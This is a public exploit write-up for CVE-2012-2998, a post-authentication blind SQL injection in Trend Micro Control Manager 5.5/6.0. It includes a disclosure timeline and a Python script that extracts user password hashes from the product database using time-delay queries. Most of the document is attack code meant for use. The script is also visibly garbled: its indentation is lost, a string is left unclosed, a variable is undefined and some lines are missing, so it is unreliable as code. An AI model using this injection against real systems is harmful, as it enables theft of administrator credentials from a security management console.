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Trend Micro Control Manager 5.5/6.0 AdHocQuery BlindSQL Injection (post-auth)

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Python code:

#!/usr/bin/env python

# Exploit Title: Trend Micro Control Manager 5.5/6.0 AdHocQuery BlindSQL Injection (post-auth)
# Disclosure Date: 09/27/2012
# Author: otoy (@otoy_rood) & modpr0be (@modpr0be)
# Contact: research[at]spentera.com
# Platform: Windows
# Tested on: Windows 2003 Standard Edition
# Software Link: http://www.trendmicro.com/ftp/products/tmcm/CM6_Package.zip
# References: http://www.spentera.com/2012/09/trend-micro-control-manager-sql-injection-and-xss-vulnerability/
# CVE-ID: CVE-2012-2998

### Software Description
# Trend Micro Control Manager is a centralized security management for the enterprise.
# The web-based management console tracks security performance, reports malware events and
# policy violations, and automates routine tasks. New features include a customizable dashboard
# and at-a-glance access to threat statistics from the Trend Micro Smart Protection Network,
# Trend Micro's cloud-based security infrastructure.

### Vulnerability Details
# Vulnerability found in AdHocQuery module inside the id parameter. By injecting payload after the
# id parameter, let say ' WAITFOR DELAY '0:0:5'-- the web application hung for 5 seconds,
# which gives us a conclusion that the web application is vulnerable to time-based sql injection.

# The script below is just a proof of concept, you must get a cookie. This vulnerability will need some
# attack vectors to be exploited, but it is still a vulnerability.
# Remember to set the cookie first.

### Disclosure Timeline
# 07/23/2012 - Bug found
# 07/25/2012 - Reported to CERT/CC
# 07/26/2012 - Reported to JPCERT/CC
# 08/14/2012 - Vendor received the vulnerability
# 09/20/2012 - Vendor acknowledged the vulnerability
# 09/27/2012 - Public advisory released

import sys,time,urllib,urllib2

print """
| |
| ___| | |
| \___ \ __ \ _ \ __ \ __| _ \ __| _` | |
| | | | __/ | | | __/ | ( | |
| _____/ .__/ \___|_| _|\__|\___|_| \__,_| |
| _| |
| |
| Trend Micro Control Manager BlindSQLi Password Extractor |
| CVE-2012-2998 |
| by otoy & modpr0be (research[at]spentera.com) |
| |
host = raw_input("[+] Target IP: ")
target = 'https://%s/webapp/AdHocQuery/AdHocQuery_Processor.aspx' %(host)
#SQLi delay, for remote target increase the delay time (default: 2 seconds)

cookie = ("ASP_NET_SessionId=pazibiigfom13ijbaaqxxx55; .ASPXAUTH=582E40E7A78D452B18EF6719DE422CE121E3E7793E2FB661679753C1DCA50D9F7873CFF37BAF54AB3CCD84F5899D930A5D190F2C99552739F1C19FAF80F3EEE444951D0C9B7F6FD707E83BFC02ABD21D; WFINFOR=test")

def Hex2Des(item):
return ord(hex(item).replace('0x',''))

def konek(m,n):
#borrow from SQLmap
query=("' IF(UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(Password AS NVARCHAR(4000)),CHAR(32))) FROM db_ControlManager.dbo.tb_UserInfo"
" WHERE CONVERT(NVARCHAR(4000),Password)>CHAR(32)),%s,1)) > %s) WAITFOR DELAY '0:0:%s'--" %(m,n,delay))

values = { 'Action': 'View',
'id': '350b651c-15c5-45ca-8d64-33b20f3fc4d8'+query,
'asc': 'true',
'Sort': 7,
'paging': 10 }

url = "%s?%s" % (target, urllib.urlencode(values))
req = urllib2.Request(url)
req.add_header('Cookie', cookie)
response = urllib2.urlopen(req)
endtime = time.time()
return int(endtime-starttime)
print '\n[-] Uh oh! Exploit fail..'

print "[+] Using Time-Based method with %ds delay."%int(delay)
print "[+] Starting to extract hash from the first user."
sys.stdout.write('[+] Here is the hash : ')

starttime = time.time()
for m in range(1,33):
for n in range(0,16):
wkttunggu = konek(m,Hex2Des(n))
if (wkttunggu < delay):
endtime = time.time()
print "\n[+] Done! Hash extracted in %d seconds" %int(endtime-starttime)


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